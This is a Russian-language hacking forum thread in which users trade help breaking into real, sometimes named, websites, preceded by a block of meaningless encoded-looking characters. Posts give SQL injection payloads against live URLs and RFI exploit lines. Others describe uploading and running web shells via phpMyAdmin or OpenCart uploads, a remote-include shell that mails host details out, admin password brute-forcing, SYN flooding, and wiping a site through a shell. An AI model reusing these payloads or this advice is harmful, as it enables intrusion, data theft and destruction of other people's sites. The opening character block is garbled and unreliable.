X+LUAc7Xa2IS1JqSHF9ms1f3VhHXepe0SKhrSoIhJdEChwXRZ5 jJKiNUmhVAqU+6MkBHKtAUR/Y/2BDhEyri4+lhjD2PMClFPZWLGdNrlyMrkWpuTLRXz0sGhpvGox j8hM9F3WZ0gVxRmgkxnYBDvnOaWZEzS+KPUeugpmgh09rFTtQv 7stU2PFB/akvyiITVgVQ5WEKvncpVZPYDFjHYPVRy8xHvZhgR9XR1RPcKa1 FLHuFTxZ0XlUl7toAPR+HRpykevhTVoK/fhWI6lklEwZ+e2y206vVxLFhCesi9LG4RLJgE+ILupTLNVWh9A h3+iulTCkaQ1LMhTINpYkCuyYqUio8QPMLIsmLiamg75Q6FN+J XrKlXPnit7qFzgpMj/zhSdfyJpnFT2efhB/JA2ez07crrgBc7Nn0dq9zm9dTI2N9Rr19cajWD6ZDU71AeM2Tq RkeooTR1gbegUFFvygMc6uU1hE6ozvDB8IVHzqv33y2aMbuydD p1Y9LtRr9wAOPvghQh2Zaz6XLZ67JEc7+sU/gc3HrcFA8JGqu0sXHAxLFjLkb6qed0csjyZ0ncxZ64G05NXR98 82V/oECYglmkywirCRLpnrGs1S8oPoLUbHgtrcggstdOO9iBEMWSwW NpSi0MVoZEXLXJuLF1OhPc+YkJDlAPVHmj85w1Sih7GH848Mxe hFqkKEmahejRPcNhQ0WmgBZEyOi5GNPwsGOCSX/6t+aJ/Av33urGg9m7R52iMuyvgDbo0O5i6avmnghaQHWAfQELKyhet4w v0NlQYd9Aey7HFYfN/YbfqAgKMAPfASFmoyGY4Xvft6KgZ94DtkgciozEC960PGA933q o13IT8BcU4MzMt2ay+nQJMETBalBAMwmR3blfFzqbj722HAAaW dWG/pVXGTcl8Zk6avv6IGHTgbqNSXH5k8WgOVPppRFfTpGT7CFZv4j CYs9oBXS4cHm
FBCF/X7B628k3tz0soDj015JuO+vapllfgYRxDOPfCb629fBlwnO64F b8hfYiXz9IPe8gh2hRw8vpH+/4bGSwpxBiJQLIedUYD0A0BAZSJtoADTJc+i2Yp0QfKBLrowjig mBloGIhsK1Vw0Oxl6HufXEoiLENsuGAFJwPsxEz/+f56OpLKXSqjuU2Pw8ZTyXSwH/ivufNSwyHW2c+SyRgg5VrCkCjsePUYqE3lH0E1xomnhERYETOC vmJ3V4WCOpOE5TRC/CUgojnWB2
Но при каждом уведомлении об изменении текст в файле другой. Что это и как бороться?
persmash
10.09.2012, 20:04
Привет там,
Есть кто-нибудь, кто знает, как использовать этот подвиг?
http://3dwebdesign.org/forum/index.php?showtopic=1113
Привет там,
Есть кто-нибудь, кто знает, как использовать этот подвиг?
http://3dwebdesign.org/forum/index.php?showtopic=1113
Об этом можно забыть, просто очередной вебмастер который косит под "знающего".
Я правда понятия не имею причем тут RFI он сказал, мне кажется он даже не знает что это. А фраза: "2. Hacker make POST requests to com_installer or com_templates" это люди просто пытались залить шелл через админку. Я уверен, что сайты его взломали через SQL одного из дырявых компонентов.
Единственное, что он правильно написал как защитится от практически 95% взломов на Joomle.
persmash
11.09.2012, 22:37
Об этом можно забыть, просто очередной вебмастер который косит под "знающего".
Я правда понятия не имею причем тут RFI он сказал, мне кажется он даже не знает что это. А фраза: "2. Hacker make POST requests to com_installer or com_templates" это люди просто пытались залить шелл через админку. Я уверен, что сайты его взломали через SQL одного из дырявых компонентов.
Единственное, что он правильно написал как защитится от практически 95% взломов на Joomle.
Вы знаете, любой метод, чтобы взломать Joomla 1.5.26?
Нужно слить все файлы сайта, wordpress. Шелл успешно залит, но с неочень хорошими правами, все заархивировать в один файл не получается (использую wso). мб есть какой нибудь шелл с функцией скачки файлов, чтоб не скачивать все по-одному?
Нужно слить все файлы сайта, wordpress. Шелл успешно залит, но с неочень хорошими правами, все заархивировать в один файл не получается (использую wso). мб есть какой нибудь шелл с функцией скачки файлов, чтоб не скачивать все по-одному?
PAS (ссыль на Rdot.org (https://rdot.org/forum/showthread.php?t=1567))
Выделяешь папку - жмёшь Download - архивирует на лету
Всем привет, как можно залить шелл на джумалу, кроме как через медиа менеджер и установку расширений ?
Всем привет, как можно залить шелл на джумалу, кроме как через медиа менеджер и установку расширений ?
Версия? Папки доступные к заливу? И так далее...
[anonimo]
02.10.2012, 23:56
Где найти уроки по Взлому сайта? не моя специфика, но почитать на досуге хочу, желательно чтобы было все понятно, до мелочей. Шеллы, и.т.п
Версия? Папки доступные к заливу? И так далее...
Сайтов много, по разному.
Reverser
15.10.2012, 16:04
вопрос по Joomla 1.5.26
Помогите танкисту: имеется суперадминский доступ к админке (логин, пароль), но файл admin.login.php удалён. Как получить ftp доступ?
winstrool
15.10.2012, 16:35
"]
[anonimo] said:
Где найти уроки по Взлому сайта? не моя специфика, но почитать на досуге хочу, желательно чтобы было все понятно, до мелочей. Шеллы, и.т.п
Перечитай все что написано вот в этом топе:
/thread104591.html
и по шелам давольно токи не плохой вот в этом топе:
/thread307894.html
Помогите танкисту: имеется суперадминский доступ к админке (логин, пароль), но файл admin.login.php удалён. Как получить ftp доступ?
У Joomla страница авторизации site.com/administrator/index.php
Reverser
16.10.2012, 16:36
У Joomla страница авторизации site.com/administrator/index.php
Я ж и говорю, что всё было бы очень просто, если бы файл admin.login.php не был удалён. Т.е. сейчас нет никакой возможности попасть в админку: http://mephisto.com.ua/administrator/index.php = 404
Я ж и говорю, что всё было бы очень просто, если бы файл admin.login.php не был удалён. Т.е. сейчас нет никакой возможности попасть в админку: http://mephisto.com.ua/administrator/index.php = 404
Может быть это ?
Тыц (https://antichat.live/showpost.php/p/3273028/postcount/365/)
Добрый день. Суть такова: нужно в учебных целях посмотреть уязвимости сайтов, сделанные с помощью cms, а я нубец. Подскажите пожалуйста пару атак, которые я смогу сделать на сайт, который будет у меня на денвере сделан с помощью joomla (2.5, но не принципиально). (ну то есть т.к. цели учебные, атаковать я буду себя) Думаю sql инъекция подойдет)
И мб посоветуете для изучения уязвимостей какие-то другие цмски? Ну чтоб даже нуб смог провести атаку и понять ее суть, а еще лучше, чтобы в последствии от этой уязвимости избавиться)
посмотреть уязвимости цмс Joomla Mambo (https://forum.antichat.net/thread50600.html)
узнаешь версию джумлы установленную у тебя на денвере. идешь сюда (https://forum.antichat.net/thread50600.html) и ищеш уязвимость под свою версию - атакуешь)
Думаю да,скюл инджект подойдет тебе.
Для изучегия других уязвимостей цмс и смф посмотри здесь (https://forum.antichat.net/forum114.html)
чтобы в последствии избавится от уязвимости ищеш заплатку-исправление и патчишь уязвимую смц.
Вроде достаточно развернутый ответ дал.
Pirotexnik
24.10.2012, 17:10
Хотел бы добавить, что существует такая штука, как DVWA. Что-то вроде тренировачной площадки хакера. 3 уровня сложнасти для каждого популярного типа уязвимостей.
sql
xss
lfi\rfi
code exec
и тд.
Сабж по теме я человек новый в данной сфере. Вот решил изучить SQL инъекцию. Нашел сайт и поставил ковычку в ответ получил
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND id NOT IN (2461, 1759)' at line 1
Что это означает?
Сабж по теме я человек новый в данной сфере. Вот решил изучить SQL инъекцию. Нашел сайт и поставил ковычку в ответ получил
Что это означает?
Читай это (https://antichat.live/threads/43966/)
BigBear читал делал, перебор UNION SELECT 1-- и все это ошибка пропадает. Потом делаю UNION SELECT 1,2-- и ошибки снова нет теперь думаю сколько там колонок?
Здравствуйте,форумчане! Копался я как обычно в нэте и пришла мне в голову идейка подпортить кому-нибудь настроение. В общем,нашел сайт и один интересный баг. Как я понял где-то используется переменная хттп-реферер и если в запросе будет ',то выдает ошибку...например: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://сайт.ru/wiew_task.php?page=task'')' at line 1. Гуглил...пытался объединить запросы юнионом, подставить 2 запроса - толку 0 т.к выдает постоянно синтаксическую ошибку. Идеи?
BigBear
читал делал, перебор UNION SELECT 1-- и все это ошибка пропадает. Потом делаю UNION SELECT 1,2-- и ошибки снова нет теперь думаю сколько там колонок?
Здравствуйте,форумчане! Копался я как обычно в нэте и пришла мне в голову идейка подпортить кому-нибудь настроение. В общем,нашел сайт и один интересный баг. Как я понял где-то используется переменная хттп-реферер и если в запросе будет ',то выдает ошибку...например: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://сайт.ru/wiew_task.php?page=task'')' at line 1. Гуглил...пытался объединить запросы юнионом, подставить 2 запроса - толку 0 т.к выдает постоянно синтаксическую ошибку. Идеи?
Если не можете реализовать сами - нет смысла звать на помощь телепатов. Судя по всему - вы в теме недавно. Поэтому (пока учитесь) лучше писать url и уязвимые параметры, если хотите быстрой и адекватной помощи.
З.Ы. Инъекция в HTTP_Referer подобна инъекции в строковом параметре. Но ты судя по всему ещё скобку пропустил.
Если не можете реализовать сами - нет смысла звать на помощь телепатов. Судя по всему - вы в теме недавно. Поэтому (пока учитесь) лучше писать url и уязвимые параметры, если хотите быстрой и адекватной помощи.
З.Ы. Инъекция в HTTP_Referer подобна инъекции в строковом параметре. Но ты судя по всему ещё скобку пропустил.
т.е уязвимые параметры? на сайте,на любой странице можно подставить ?id(можно task,about,ololo - не важно!!)=' и при переходе на другую страницу будет вылазить ошибка,могу скинуть весь урл сайта,но боюсь разберут на части и мне не оставят)))
т.е уязвимые параметры? на сайте,на любой странице можно подставить ?id(можно task,about,ololo - не важно!!)=' и при переходе на другую страницу будет вылазить ошибка,могу скинуть весь урл сайта,но боюсь разберут на части и мне не оставят)))
Для этого и существует Личная Почта.
Если чесно, то искал. Вопрос в том, что есть дамп joomla, в таблице jos_users в поле usertype пустые значения у всех юзеров, как определить кто из них супер админ?
Если чесно, то искал. Вопрос в том, что есть дамп joomla, в таблице jos_users в поле usertype пустые значения у всех юзеров, как определить кто из них супер админ?
обычно у id=62 СуперАдминские права (по дефолту)
обычно у id=62 СуперАдминские права (по дефолту)
В том то и дело что такого id нет, еще попадаются дампы где в поле usertype стоит deprecated (я так понял это тоже один из признаков суперадмина?
есть ли софт для автоматизации поиска MySQL уязвимостей по одному сайту?
есть ли софт для автоматизации поиска MySQL уязвимостей по одному сайту?
Havij он есть во фри версии.
Havij он есть во фри версии.
как его юзать для поиска уязвимых ссылок? вот например если ввести в поле таргет www.sbaza.net то он отказуется искать, если прописую уязвимую ссылку типа http://www.sbaza.net/download_zip.php?id_clanka=1587 то он сразуже успешно выводить таблицу.
вот мне и нужна прога для поиска таких ссылок по одному сайту, а не по запросам в гугле
Подскажите пожалуйста
Здравствуйте!
Подскажите пожалуйста, как найти тему с тем чтоб народ помог поискать ошибки по sql или php инъекциям или какие либо другие.
Я хотел проверить свой сайт на наличие таких инъекций
kupimebel.ru
Здравствуйте!
Подскажите пожалуйста, как найти тему с тем чтоб народ помог поискать ошибки по sql или php инъекциям или какие либо другие.
Я хотел проверить свой сайт на наличие таких инъекций
kupimebel.ru
Раздел (https://antichat.live/forums/110/)
Правила помощи по аудиту (https://antichat.live/threads/39721/)
хочу заняться брутом джумлы
есть словарик, но там даже 1 символьные пароли есть
есть ли у джумлы минимальная длина пасса?
логин - administrator стандартный?
Есть скуля типа
')+or+1=1#
При вводе урла типа
http://examle.com/search.php?q=')+or+1=1#
На выходе получаю дамп таблицы к которой(таблице) иеет доступ только админ сайта. Можно ли как то узнать версию mysql и имя бд? Спасибо.
хочу заняться брутом джумлы
есть словарик, но там даже 1 символьные пароли есть
есть ли у джумлы минимальная длина пасса?
логин - administrator стандартный?
ограничений вроде как нет.
Дефолтный логин - admin
ограничений вроде как нет.
Дефолтный логин - admin
ну добавлю и admin и администратор)
т.е можно начинать со всех 1-2-3 символьных паролей брут?
на джумле везде токены есть?
ну добавлю и admin и администратор)
т.е можно начинать со всех 1-2-3 символьных паролей брут?
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.
на джумле везде токены есть?
Начиная с версии 1.5
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.
Начиная с версии 1.5
а у токенов всегда одинаковый формат?
или где-то будет по другому?
а у токенов всегда одинаковый формат?
или где-то будет по другому?
одинаковый. Вида мд5, 32 символа.
чем отправлять post запрос на сайт чужой?
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db (http://www.exploit-db.com/exploits/17809/)
Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)--%20
Я запрашиваю:
1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(blesse())) ),0)--%20
2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
чем отправлять post запрос на сайт чужой?
Burp Suite, HTTP Analyze -> build request
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db (http://www.exploit-db.com/exploits/17809/)
Poc:
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)--%20
Я запрашиваю:
1)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(blesse())) ),0)--%20
2)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
сайт в пм вышли, я тут синтаксис напишу нужный
Привет! Через havij получаю доступ к базе http://store.vampirefreaks.com/?cat_id=11 но не могу вытянуть пароли ,просто ??? http://imageshack.us/photo/my-images/10/utennavnxd.png/
можно как-то вытянуть пароли?
Вывод можно добиться вот так
_ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2
Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь.
А вообще тема для подобных вопросов тут (https://antichat.live/threadedpost3366669.html/)
сайт в пм вышли, я тут синтаксис напишу нужный
Ну что не осилил?
Ну что не осилил?
Продублируй в ПМ. Походу удалил случайно пока почту чистил.
-WarMan-
18.01.2013, 12:17
Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
dima.lysyj
29.01.2013, 14:19
Syn flood
Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
Угнали ФТП,- нужно проверить на шеллы
Здравствуйте форумчане, такая ситуация:
вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны.
Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа.
буду рад любой информации или предложениям!
Какой алгоритм генерации хэшей паролей использует ebiz cms?
warhamer2012
10.02.2013, 01:17
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
Кто-то пробовал? Все облазил-нашел только следующее
# Exploit :
#
# http://www.site.com/path/includes/class_block.php?classfile=[shell code]
#
# http://www.site.com/path/vb/vb.php?filename=[shell code]
#
# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]
Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
Если не сюда пишу-посоветуйте раздел, где спросить можно.
Есть frog cms, версию незнаю, не удалена папка install, есть рабочие способы получить админа - прочитть config.php , или хотя бы что-нибудь? с ресурса нужно слить все - и базу и шаблон.
В общем хочу слить бд с сайта и есть sql иньекция но там есть фильтр/ы, пробывал с '
но пишет "Hacking attempt!"
Вот подскажите какие есть обойти фильтр
В общем хочу слить бд с сайта и есть sql иньекция но там есть фильтр/ы, пробывал с '
но пишет "Hacking attempt!"
Вот подскажите какие есть обойти фильтр
Как мы должны попытаться тебе помочь не видя инъекции ?
Шанс что мы попадём пальцев в небо - очень не велик.
http://wrps-portal.ru/2012/page/2/?do=search&subaction=search^story=1
вот как бы
http://wrps-portal.ru/2012/page/2/?do=search&subaction=search^story=1
вот как бы
Это же DLE. Там всё прекрасно фильтруется.
я то знаю что это DLE, какие способы есть то?
я то знаю что это DLE, какие способы есть то?
Для последних версий - никаких.
Поищи уявзимые плагины (определи, что за форум, можно скачать и поставить такой же себе и порыться в коде). Чаще всего в плагинах находятся какие-нибудь уязвимости.
3y6aH, DLE Forum plugin 2.x SQL Injection Exploit (0day) (http://1337day.com/exploit/description/19996)
а кроме "DLE Forum plugin 2.x SQL Injection Exploit (0day)" есть что нибудь и в паблике :3
METRuby601
31.03.2013, 01:38
народ, можете подсказать где правка шаблона в джумле?
/showpost.php?p=3457357&postcount=51
На интересующем меня сайте, открыт доступ на site.com/server-status/ . Т.е вижу все действия там, в том числе и авторизации админа. К сожалению пароль там обризается из-за длинны строчки и видны только первые символы. Хотел бы узнать, можно ли как нибудь увидеть всю строчку? или какую пользу эта страничка еще может принести?
Не уверен, что сработает, но всё же: попробуйте поглядеть логи через вот так:
A machine-readable version of the status file is available by accessing the page http://your.server.name/server-status?auto. This is useful when automatically run, see the Perl program in the /support directory of Apache, log_server_status.
Раз уже открыт ServStat, то почему бы не использовать его функции... Я могу ошибаться.
PS пруф (http://httpd.apache.org/docs/2.0/mod/mod_status.html)
https://www.atitv.ru/administrator/index.php
joomla пожалуйста скажите какая версия?
http://www.atitv.ru/language/en-GB/en-GB.xml
http://www.atitv.ru/language/en-GB/en-GB.xml
Спасибо!
andros0789
01.05.2013, 22:53
http://lol.cavendish10.fr/themes/EvilGame/
Есть такое дело господа)
возможно ли вытащить этот шаблон отсюда?) CMS Nuked Klan
Заранее благодарю!
Ошибка компонента com_wrapper. При переходе "http://www....ru/index.php?option=com_wrapper&view=wrapper&Itemid=" выдает вот это на странице
"Notice: Trying to get property of non-object in /home/naz.../gim...ru/docs/components/com_wrapper/wrapper.php on line 53" - гуглил не раз, говорят что тут должна быть sql injection... Может кто-нибудь сказать можно из этого что-нибудь извлечь?
Ошибка компонента com_wrapper. При переходе "http://www....ru/index.php?option=com_wrapper&view=wrapper&Itemid=" выдает вот это на странице
"Notice: Trying to get property of non-object in /home/naz.../gim...ru/docs/components/com_wrapper/wrapper.php on line 53" - гуглил не раз, говорят что тут должна быть sql injection... Может кто-нибудь сказать можно из этого что-нибудь извлечь?
Попробуй ItemId поставить корректный. Например 1.
А потом мути SQL инъект.
Если в ItemId подставить 1, то ошибка просто исчезает, если же 2,5,6 и т.д то появляется) "http://www.gim-naz.ru/index.php?option=com_wrapper&view=wrapper&Itemid=2 " может тут вообще нет инъекции?( Я же не могу ничего сделать, если попробовать подобрать поля , он ничего не выводит(никаких ошибок, ничего) это же не слепая sql?(
Тут нет SQL инъекта
Ребят, не знал куда отписать - отпишу тут. Есть доступ на шелл с ограниченными правами, при этом на другом домене нашелся руторский доступ к phpmyadmin, есть ли при этом возможность залиться с него и получить доступ root? кто может помоч если да?) Спасибо)
Всем привет! Дело имею с opencart 1.5.3.1 и 1.5.2.1 . Проблема вот в чем: успешно работает заливка файла через route=product/product/upload, получаю шифрованный ответ в json, ключ я узнал и соответственно имя файла, которое получилось на сервере тоже. Попробовал залить shell на 1.5.3.1 - все ок, работает. Заливаю также на 1.5.2.1 - болт. Версия php на обоих серваках X-Powered-By PHP/5.2.17. Покажу пример имен файлов в обоих случаях:
Успешная заливка: wso2.php.jpg.6ffe4fcbb409d434ac81279319644c8c - он работает, тут все хорошо
Неудачная заливка: test.php&#;.jpg.8604d5110d3e81f88cee94d06acab263
Как видно проблема в нуль-байте, скорее всего magic quotes. Прошу совета! Как это обойти и все-таки выполнить shell , очень нужно.
Вопрос
Подвержен ли данный код LFI ?
В папке "../../download" лежит шелл, как его проинклудить через
$route
?
public function__construct($route,$args= array() ) {
$path='';
$parts=explode('/',str_replace('../','', (string)$route));
foreach ($partsas$part) {
$path.=$part;
if (is_dir(DIR_APPLICATIO N.'controller/'.$path)) {
$path.='/';
array_shift($parts);
continue;
}
if (is_file(DIR_APPLICATI ON.'controller/'.str_replace('../','',$path) .'.php')) {
$this->file=DIR_APPLICATION.'controller/'.str_replace('../','',$path) .'.php';
$this->class='Controller'.preg_replace('/[^a-zA-Z0-9]/','',$path);
array_shift($parts);
break;
}
}
if ($args) {
$this->args=$args;
}
$method=array_shift($parts);
if ($method) {
$this->method=$method;
} else {
$this->method='index';
}
}
public functiongetFile() {
return$this->file;
}
public functiongetClass() {
return$this->class;
}
public functiongetMethod() {
return$this->method;
}
public functiongetArgs() {
return$this->args;
}
}
LFI, как можно обойти фильтрацию слешей?
LFI, как можно обойти фильтрацию слешей?
Для Windows - бэк-слэшами.
Ещё через URL-encode можно попробовать.
Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS.
Есть доступ к root на phpMyAdmin.
Как получить шелл?
Смотрел видео типа: http://youtu.be/fiIO_X0gJoU
Пробовал не выходит. В туториале все шаманится на Xampp под виндой.
Очевидно нету прав на запись в директорию или не правильно указываю путь.
SELECT * FROM shell INTO OUTFILE '/var/www/shell.php';
Результат:
#1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13)
Ткните носом, плиз.
Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS.
Есть доступ к root на phpMyAdmin.
Как получить шелл?
Смотрел видео типа: http://youtu.be/fiIO_X0gJoU
Пробовал не выходит. В туториале все шаманится на Xampp под виндой.
Очевидно нету прав на запись в директорию или не правильно указываю путь.
SELECT * FROM shell INTO OUTFILE '/var/www/shell.php';
Результат:
#1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13)
Ткните носом, плиз.
!!!!
Очевидно нету прав на запись в директорию или не правильно указываю путь.
Вопрос по Bitrix:
В БД в таблице юзер есть колонка "CHECKWORD"
На сайте Битрикса в хелпе прочел что эта колонка содержит код для восстановления пароля.
Насколько я понял - с помощю этого кода , как бы, можно поменять пасс. Зашел в восстановление пасса. Там есть поле для этого кода. Ввел. Но пишет что код не верный.
Как же все таки работает восстановление в Битрикс? Кто знает? Может все таки нужно вначале нажимать на ссылку для восстановления пароля для отправки на мыло и тогда генерится новый код (а этот уже не рабочий, устаревший)? Или еще какая мутка?
Martyn911
27.09.2013, 14:23
Здравствуйте, есть у меня такой инклуд
include("http://www.mysite.ru/shell.php");
Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код
$ip=($_SERVER['SERVER_ADDR']);
$host=($_SERVER['SERVER_NAME']);
mail("pochta@yandex.ru", "$host", "$host\n$ip");
но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
Martyn911
28.09.2013, 01:06
Здравствуйте, есть у меня такой инклуд
include("http://www.mysite.ru/shell.php");
Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код
$ip=($_SERVER['SERVER_ADDR']);
$host=($_SERVER['SERVER_NAME']);
mail("pochta@yandex.ru", "$host", "$host\n$ip");
но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
никто не знает или написал очень запутано?
Нашёл на сайте SQL-inj.
Данных для авторизации в админке там не было, но была таблица mysql.
Разхешил пасс и попал в phpmyadmin(v 3.5.7).
Остаётся только залить шелл, но я не нашёл полного пути.
При попытке спровоцировать ошибку в скрипте с SQL-inj происходит редирект на 404.
Так же есть READ FILE.
Server type: Apache/2.2.24 (FreeBSD) PHP/5.4.10 mod_ssl/2.2.24 OpenSSL/0.9.8q DAV/2 (Speed: 0.04)
Version: PHP/5.4.10
Собственно как можно раскрыть полный путь к сайту??
М.б. в логах каких-нибудь прочитать??
Нашёл на сайте SQL-inj.
Данных для авторизации в админке там не было, но была таблица mysql.
Разхешил пасс и попал в phpmyadmin(v 3.5.7).
Остаётся только залить шелл, но я не нашёл полного пути.
При попытке спровоцировать ошибку в скрипте с SQL-inj происходит редирект на 404.
Так же есть
READ FILE
.
Server type: Apache/2.2.24 (FreeBSD) PHP/5.4.10 mod_ssl/2.2.24 OpenSSL/0.9.8q DAV/2 (Speed: 0.04)
Version: PHP/5.4.10
Собственно как можно раскрыть полный путь к сайту??
М.б. в логах каких-нибудь прочитать??
конфиги apache читай
конфиги apache читай
можно по-подробней плз?
можно по-подробней плз?
Ты вообще в курсе что такое apache?
Ищи либо /etc/apache2/apache2.conf либо /etc/httpd/httpd.conf
возможно другое название файла, но это самые распространенные, у тебя скорее всего первый вариант будет.
А там (в этом файле) ищи расположение директории с файлами веб-сервера.
p.s. а вообще советую установить apache на виртуалке и разобраться в настройках.
Ты вообще в курсе что такое apache?
Ищи либо /etc/apache2/apache2.conf либо /etc/httpd/httpd.conf
возможно другое название файла, но это самые распространенные, у тебя скорее всего первый вариант будет.
А там (в этом файле) ищи расположение директории с файлами веб-сервера.
p.s. а вообще советую установить apache на виртуалке и разобраться в настройках.
Я читал через Havij.
etc/passwd - всё ок
/etc/apache2/apache2.conf и /etc/httpd/httpd.conf ничего не выводит
Я читал через Havij.
Ты ручками научись сначала =)
/etc/apache2/apache2.conf и /etc/httpd/httpd.conf ничего не выводит
Что могу сказать, ищи конфиги, ищи! У phpmyadmin ищи, у всего что установлено ищи.
стандарт проверь /var/www/index.php воображение включай и вперед.
Ты ручками научись сначала =)
Я же говорил, что там 404)) поэтому так))
Что могу сказать, ищи конфиги, ищи! У phpmyadmin ищи, у всего что установлено ищи.
стандарт проверь /var/www/index.php воображение включай и вперед.
А с путём кажется что определился:
/usr/local/www/site.ru
Только вот прав кажись нету ((
UP:
Нашёл на сервере phpinfo.
Можно ли как-то найти папку с правами на запись, что бы шелл залить?
UPPP:
всё, залил. всем спс))
PS Может кому пригодиться:
расположение логов апача (https://antichat.live/threads/91807/)
hahanovB
11.10.2013, 11:34
Подскажите шелл для удаления сайта.
Подскажите шелл для удаления сайта.
Да в принципе можно тот же самый WSO.
Через него удали все файлы на сервере и БД...
Но рекомендую сделать dump всего =)
rosty2008
14.10.2013, 20:29
А не подскажите есть ли какие нибудь уязвимости в instantCMS?
у меня есть доступ к файлам хостинга, кроме папки home, где собственно и лежат все сайты, доступ к которым я и хочу получить
У меня есть доступ к папкам [ boot ] [ dev ] [ etc ] [ lib ] [ lib32 ] [ lib64 ] [ media ]
[ mnt ] [ opt ] [ proc ] [ root ] [ sbin ] [ sys ] [ tmp ] [ usr ] [ var ]
есть ли от них смысл? Могу ли я покопавшись в этих файлах найти что-то полезное?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot